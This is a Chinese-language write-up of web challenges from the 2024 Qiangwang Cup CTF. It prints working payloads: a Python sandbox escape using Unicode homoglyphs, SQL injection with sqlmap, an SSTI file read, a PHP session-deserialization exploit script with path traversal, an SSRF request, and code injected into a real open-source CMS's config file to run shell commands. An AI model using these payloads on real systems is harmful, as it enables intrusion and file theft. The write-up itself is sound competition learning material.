强网杯wp

本文最后更新于:2024年12月14日 下午

PyBlockly

image-20241103164614516

脚本爆破特殊字符绕过,__import__可以导入模块。覆盖python内置函数len,使其恒返回1

1
2
3
4
5
6
7
8
9
10
11
12
import unidecode

char_range = range(0, 10000)

converted_plus_chars = []
for i in char_range:
    char = chr(i)
    if unidecode.unidecode(char) == '=':
        converted_plus_chars.append(char)
for c in converted_plus_chars:
    print(repr(c))

flag权限不够,可以用dd提权

1
dd if=/flag
1
2
‘)፤__builtins__。len ⇐ lambda x፥ 1◳
‘+str(__import__(‘os’)᙮system(‘dd if⇔↗flag’))+’

最终payload

snake

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
import requests
from collections import deque

# 游戏参数
GRID_WIDTH = 20
GRID_HEIGHT = 20
DIRECTIONS = ['UP', 'DOWN', 'LEFT', 'RIGHT']
MOVES = {
    'UP': (0, -1),
    'DOWN': (0, 1),
    'LEFT': (-1, 0),
    'RIGHT': (1, 0)
}

# 初始化会话
session = requests.Session()

base_url = 'http://eci-2zeg4gjm1ccotm7csi62.cloudeci1.ichunqiu.com:5000/'

headers = {
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'User-Agent': 'Mozilla/5.0',
    'Content-Type': 'application/json',
    'Accept': '*/*',
    'Origin': base_url,
    'Referer': base_url + '/',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
}

cookies = {
    'session': 'eyJ1c2VybmFtZSI6Int7MSAxfX0ifQ.ZyZPqA.r1I5UHgWZtPRZBpdaxzAJE9-Vg4'
}

def send_move(direction):
    data = {"direction": direction}
    response = session.post(base_url + '/move', headers=headers, cookies=cookies, json=data)
    if response.status_code == 200:
        # 打印原始服务器返回的JSON数据
        print("服务器返回的JSON:", response.text)
        return response.json()
    else:
        print("Error:", response.status_code)
        return None

def bfs(snake, food, grid_width, grid_height):
    head = tuple(snake[0])
    snake_body = set(tuple(pos) for pos in snake)
    queue = deque()
    queue.append((head, []))
    visited = set()
    visited.add(head)
    while queue:
        current_pos, path = queue.popleft()
        if current_pos == tuple(food):
            return path
        for direction, (dx, dy) in MOVES.items():
            new_x = current_pos[0] + dx
            new_y = current_pos[1] + dy
            new_pos = (new_x, new_y)
            if 0 <= new_x < grid_width and 0 <= new_y < grid_height:
                if new_pos not in snake_body and new_pos not in visited:
                    visited.add(new_pos)
                    queue.append((new_pos, path + [direction]))
    return None  # 没有找到路径

def get_next_positions(snake, grid_width, grid_height):
    head_x, head_y = snake[0]
    possible_moves = {}
    for direction, (dx, dy) in MOVES.items():
        new_x = head_x + dx
        new_y = head_y + dy
        # 检查边界
        if 0 <= new_x < grid_width and 0 <= new_y < grid_height:
            # 检查新位置是否在蛇的身体上
            if [new_x, new_y] not in snake:
                possible_moves[direction] = [new_x, new_y]
    return possible_moves

# 开始游戏
state = send_move('RIGHT')
if not state:
    print("无法开始游戏。")
    exit()

food = state['food']
snake = state['snake']

print("开始游戏。")

while True:
    path = bfs(snake, food, GRID_WIDTH, GRID_HEIGHT)
    if path:
        next_move = path[0]
    else:
        # 没有找到路径,随机选择一个安全的方向
        possible_moves = get_next_positions(snake, GRID_WIDTH, GRID_HEIGHT)
        if possible_moves:
            next_move = list(possible_moves.keys())[0]  # 选择任意一个有效的方向
        else:
            print("没有可移动的位置,游戏结束。")
            break
    state = send_move(next_move)
    if not state:
        print("无法从服务器获取游戏状态。")
        break
    if state.get('status') != 'ok':
        print("游戏结束:", state)
        break
    food = state['food']
    snake = state['snake']
    print("移动方向:", next_move, "当前得分:", state['score'])

用ai写了自动玩游戏脚本

发现路由snake_win?username=test

单引号报错,可以sql注入

1
sqlmap -u "http://test.com/snake_win?username=4" --level 3 --batch -D sqlite --dump-all

测试发现在/set_username路由打ssti,可以在数据库里回显

e7a87c52c28923fe3705c4effbe694dc

{{().__class__.__bases__[0].__subclasses__()[79]["get_data"](0, "/flag")}}

platform

session反序列化

a34359bdb655f547f26407974947caaf

这里有目录穿越

利用public function filterSensitiveFunctions()可以打扩展长度攻击,把前面的username黑名单掉了,后面就可以有额外的长度,放我们的序列化数据。

但是要一个满足我们长度要求的sessionid,写个脚本循环提交,直到正好满足我们的长度要求。system被过滤了,拼接一下就好了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import random
import string


url="http://eci-2ze8q3dnoj0sy32l7ism.cloudeci1.ichunqiu.com/"
cmd = "$a='sys'.'tem';$a('/readflag');"
while True:
    rand_session = ""
    username="popen"*14
    for i in range(10):
        rand_session += random.choice("qwertyuiopasdfghjklzxcvbnm1234567890")
    res=requests.post(url+"index.php",cookies={"PHPSESSID":rand_session},data={"username":username,"password":'test";test|O:15:"notouchitsclass":1:{s:4:"data";s:31:"cmd";}'.replace('cmd',cmd)},allow_redirects=False)
    res=requests.post(url+"index.php",cookies={"PHPSESSID":rand_session},data={"username":username,"password":'test";test|O:15:"notouchitsclass":1:{s:4:"data";s:31:"cmd";}'.replace('cmd',cmd)},allow_redirects=False)
    print(rand_session)
    print(username)
    print(res.text)
    res=requests.post(url+"index.php",cookies={"PHPSESSID":'../'+"sess_"+rand_session},data={},allow_redirects=False)
    print(res.text)
    res=requests.get(url+"dashboard.php",cookies={"PHPSESSID":rand_session},allow_redirects=False)
    print(res.text)

这里发了两次覆盖请求,是因为测试发现一次似乎覆盖不进session。猜测可能第一次没创建文件?

proxy

构造个接口就行了

1
2
3
4
5
6
7
curl -X POST http://39.106.54.211:22553/v2/api/proxy \
     -H 'Content-Type: application/json' \
     -d '{
           "url": "http://127.0.0.1:8769/v1/api/flag”,
           "method": "GET",
           "follow_redirects": true
         }'

xiaohuanxiong

1
https://github.com/Empty2081/raccoon5

github有源代码

测试发现/admin/books/admin/admins都可以未授权访问

直接添加新管理员

登陆后在订单管理里可以向config/payments.php写文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
phpinfo();
echo system("cat /flag");
return [
    'default' => [ //默认无支付模式
        'channel' => [
        ]
    ],
    'pay' => [ //幻兮支付,官网地址:https://www.zhapay.com/
        'appid' => '',
        'appkey' => '',
        'channel' => [
            ['type' => 2, 'code' => 1, 'img' => 'alipay', 'title' => '支付宝'],
            ['type' => 1, 'code' => 3, 'img' => 'weixin', 'title' => '微信支付']
        ]
    ],
    'kami' => [
        'url' => '' //卡密地址
    ],
    'vip' => [  //设置vip天数及相应的价格
        ['month' => 1, 'price' => 5],
        ['month' => 6, 'price' => 100],
        ['month' => 12, 'price' => 400]
    ],
    'money' => [1, 5, 10, 30, 50], //设置支付金额
    'promotional_rewards_rate' => 0.1, //设置充值提成比例,必须是小数
    'reg_rewards' => 1, //注册奖励金额,单位是元
    'mobile_bind_rewards' => 0 //绑定手机奖励金额,单位是元
];
#CTF
强网杯wp
http://gensokyo.cn/2024/11/28/强网杯wp/
作者
s1ain
发布于
2024年11月28日
许可协议